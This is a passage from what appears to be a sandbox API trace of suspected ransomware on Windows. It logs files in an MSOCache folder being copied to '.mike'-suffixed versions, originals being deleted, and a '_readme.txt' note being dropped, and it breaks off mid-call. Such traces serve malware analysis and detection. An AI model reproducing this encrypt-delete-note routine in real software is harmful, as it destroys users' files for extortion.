(in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0040.817] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0040.817] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.817] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.817] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpFilePart=0x0) returned 0x4d [0040.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.818] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.818] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.825] GetFileType (hFile=0x264) returned 0x1 [0040.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.825] GetFileType (hFile=0x264) returned 0x1 [0040.825] CloseHandle (hObject=0x264) returned 1 [0040.826] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.826] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.826] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x218e4fc | out: lpFileInformation=0x218e4fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.826] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x218e834 | out: lpFileInformation=0x218e834*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.826] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0040.827] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0040.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.827] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.827] GetFileType (hFile=0x264) returned 0x1 [0040.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.827] GetFileType (hFile=0x264) returned 0x1 [0040.827] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0040.827] WriteFile (in: hFile=0x264, lpBuffer=0x218f770*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x218f770*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0040.828] CloseHandle (hObject=0x264) returned 1 [0040.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0040.829] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x218f244 | out: lpFileInformation=0x218f244*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac)) returned 1 [0040.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0040.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0040.829] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.829] GetFileType (hFile=0x264) returned 0x1 [0040.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.829] GetFileType (hFile=0x264) returned 0x1 [0040.829] ReadFile (in: hFile=0x264, lpBuffer=0x21908ac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x21908ac*, lpNumberOfBytesRead=0x2af110*=0x5ac, lpOverlapped=0x0) returned 1 [0040.830] CloseHandle (hObject=0x264) returned 1 [0040.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.831] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.831] GetFileType (hFile=0x264) returned 0x1 [0040.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.831] GetFileType (hFile=0x264) returned 0x1 [0040.831] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.831] WriteFile (in: hFile=0x264, lpBuffer=0x219596c*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x219596c*, lpNumberOfBytesWritten=0x2af104*=0x5b0, lpOverlapped=0x0) returned 1 [0040.831] CloseHandle (hObject=0x264) returned 1 [0040.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.832] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.832] GetFileType (hFile=0x264) returned 0x1 [0040.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.832] GetFileType (hFile=0x264) returned 0x1 [0040.833] WriteFile (in: hFile=0x264, lpBuffer=0x2198ba8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2198ba8*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.833] CloseHandle (hObject=0x264) returned 1 [0040.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.834] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe288ad00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe288ad00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28b0e60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0040.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.834] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x219a368 | out: lpFileInformation=0x219a368*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe288ad00, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe288ad00, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe28b0e60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7d0)) returned 1 [0040.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.834] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", dwFileAttributes=0x80) returned 1 [0040.835] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0040.836] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.836] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.836] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpFilePart=0x0) returned 0x4d [0040.836] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.836] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.836] GetFileType (hFile=0x264) returned 0x1 [0040.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.836] GetFileType (hFile=0x264) returned 0x1 [0040.836] WriteFile (in: hFile=0x264, lpBuffer=0x219c088*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x219c088*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.837] CloseHandle (hObject=0x264) returned 1 [0040.837] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpFilePart=0x0) returned 0x49 [0040.838] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.838] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.838] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.839] GetFileType (hFile=0x264) returned 0x1 [0040.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.839] GetFileType (hFile=0x264) returned 0x1 [0040.839] CloseHandle (hObject=0x264) returned 1 [0040.839] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.839] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.839] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.839] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.839] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.840] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a0200 | out: lpFileInformation=0x21a0200*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0040.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.840] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a051c | out: lpFileInformation=0x21a051c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750)) returned 1 [0040.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.840] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.841] GetFullPathNameW (in: 